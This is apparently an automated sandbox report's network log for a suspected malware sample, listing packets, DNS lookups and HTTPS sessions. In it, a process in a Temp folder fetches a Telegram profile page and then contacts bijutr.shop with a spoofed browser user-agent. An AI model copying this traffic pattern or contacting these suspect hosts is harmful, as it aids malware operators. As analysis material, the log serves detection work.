                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:14.725413084 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:14.725708961 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:14.733405113 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.057544947 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.063916922 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.063932896 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.063944101 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.064346075 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.070817947 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.394125938 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.400640011 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.400650978 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.400660038 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.405003071 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.425649881 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.748833895 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.755470991 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.755515099 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.755621910 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.761543989 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.816653013 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:15.841538906 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.113238096 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.172092915 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.178967953 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.179017067 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.179095984 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.179410934 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.187175989 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.510601044 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.515480042 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.515624046 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.515665054 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.515714884 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.521572113 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.844784021 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.851592064 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.851603985 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.851629972 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.851975918 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:16.858074903 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.186516047 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.203352928 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.203381062 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.203444004 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.203706980 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.210839987 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.534204006 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.542617083 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.542700052 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.542802095 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.543006897 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.550306082 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.873549938 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.878818989 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.878855944 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.878923893 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.879118919 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:17.888448954 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.212985992 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.218914986 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.218924999 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.219005108 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.219234943 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.224770069 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.548049927 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.553765059 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.553828955 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.553873062 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.554064989 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.559665918 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960587025 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960599899 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960608959 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960618019 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.960966110 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:18.966248035 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.289829016 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.296989918 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.297094107 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.297214031 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.297290087 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.303373098 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.626974106 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.634036064 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.634051085 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.634099007 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.634331942 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.639894962 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.964087963 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.970058918 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.970086098 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.970144987 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.970374107 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:19.976219893 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.318511963 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.319298029 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.319320917 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.319346905 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.356275082 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.423269987 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.511080980 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.703391075 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.834952116 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.839941978 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.839953899 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.840079069 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.840224981 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:20.848288059 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.172281027 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.178004026 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.178178072 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.178271055 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.178284883 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.184654951 CET53071443192.168.2.723.209.72.21
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.508332968 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.514952898 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.514966965 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:21.515059948 CET4435307123.209.72.21192.168.2.7
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:11:22.019972086 CET4435307123.209.72.21192.168.2.7

                                                                                                                                                                                                                                                                                      ICMP Packets

                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.708302021 CET192.168.2.71.1.1.1c24d(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:16.550190926 CET192.168.2.71.1.1.10x9c19Standard query (0)jCkYzqqYDalcEKzOzlTGtPWyRfbt.jCkYzqqYDalcEKzOzlTGtPWyRfbtA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:50.894941092 CET192.168.2.71.1.1.10x33e2Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:53.024977922 CET192.168.2.71.1.1.10x8363Standard query (0)bijutr.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:09.595563889 CET192.168.2.71.1.1.10xe7c6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:09.596015930 CET192.168.2.71.1.1.10xd1fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:24.529279947 CET192.168.2.71.1.1.10xc6d0Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:24.529447079 CET192.168.2.71.1.1.10xc7d7Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.028914928 CET192.168.2.71.1.1.10xe6b2Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.029139042 CET192.168.2.71.1.1.10xf4Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.331904888 CET192.168.2.71.1.1.10x5749Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.332251072 CET192.168.2.71.1.1.10x1529Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.924911022 CET192.168.2.71.1.1.10xf5acStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.927558899 CET192.168.2.71.1.1.10xc983Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.927942038 CET192.168.2.71.1.1.10x5aa3Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.023705959 CET192.168.2.71.1.1.10x513bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.059061050 CET192.168.2.71.1.1.10xa800Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.059246063 CET192.168.2.71.1.1.10xda51Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.679513931 CET192.168.2.71.1.1.10x461eStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.679994106 CET192.168.2.71.1.1.10x47f7Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.686352968 CET192.168.2.71.1.1.10xccdfStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.686678886 CET192.168.2.71.1.1.10x8dbcStandard query (0)assets.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:16.785346985 CET1.1.1.1192.168.2.70x9c19Name error (3)jCkYzqqYDalcEKzOzlTGtPWyRfbt.jCkYzqqYDalcEKzOzlTGtPWyRfbtnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:51.031877995 CET1.1.1.1192.168.2.70x33e2No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:09:53.164978981 CET1.1.1.1192.168.2.70x8363No error (0)bijutr.shop188.245.216.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:09.732707977 CET1.1.1.1192.168.2.70xe7c6No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:09.732851028 CET1.1.1.1192.168.2.70xd1fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:24.666220903 CET1.1.1.1192.168.2.70xc6d0No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:24.667823076 CET1.1.1.1192.168.2.70xc7d7No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:25.008536100 CET1.1.1.1192.168.2.70x8f03No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:25.008536100 CET1.1.1.1192.168.2.70x8f03No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:25.023725033 CET1.1.1.1192.168.2.70x977aNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.167045116 CET1.1.1.1192.168.2.70xf4No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.279422998 CET1.1.1.1192.168.2.70xe6b2No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.469239950 CET1.1.1.1192.168.2.70x5749No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.469239950 CET1.1.1.1192.168.2.70x5749No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:28.708086967 CET1.1.1.1192.168.2.70x1529No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.061450958 CET1.1.1.1192.168.2.70xf5acNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.061450958 CET1.1.1.1192.168.2.70xf5acNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.064171076 CET1.1.1.1192.168.2.70xc983No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.065757036 CET1.1.1.1192.168.2.70x5aa3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.065757036 CET1.1.1.1192.168.2.70x5aa3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.160265923 CET1.1.1.1192.168.2.70x513bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.196365118 CET1.1.1.1192.168.2.70xa800No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.196365118 CET1.1.1.1192.168.2.70xa800No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:29.196378946 CET1.1.1.1192.168.2.70xda51No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.816265106 CET1.1.1.1192.168.2.70x461eNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.816265106 CET1.1.1.1192.168.2.70x461eNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.816265106 CET1.1.1.1192.168.2.70x461eNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.816265106 CET1.1.1.1192.168.2.70x461eNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.823709011 CET1.1.1.1192.168.2.70x8dbcNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.824589014 CET1.1.1.1192.168.2.70xccdfNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.848797083 CET1.1.1.1192.168.2.70x55No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 27, 2024 07:10:32.848797083 CET1.1.1.1192.168.2.70x55No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                      • t.me
                                                                                                                                                                                                                                                                                      • bijutr.shop
                                                                                                                                                                                                                                                                                      • www.google.com
                                                                                                                                                                                                                                                                                      • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                      • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                      • https:
                                                                                                                                                                                                                                                                                        • assets.msn.com
                                                                                                                                                                                                                                                                                        • c.msn.com
                                                                                                                                                                                                                                                                                        • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                        • browser.events.data.msn.com

                                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      0192.168.2.749760149.154.167.994437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:09:52 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: t.me
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:09:53 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:09:52 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                      Content-Length: 12298
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: stel_ssid=3729f20303e52c377b_3301121134632751003; expires=Sat, 28 Dec 2024 06:09:52 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                      2024-12-27 06:09:53 UTC12298INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      1192.168.2.749766188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:09:55 UTC231OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:09:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:09:55 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
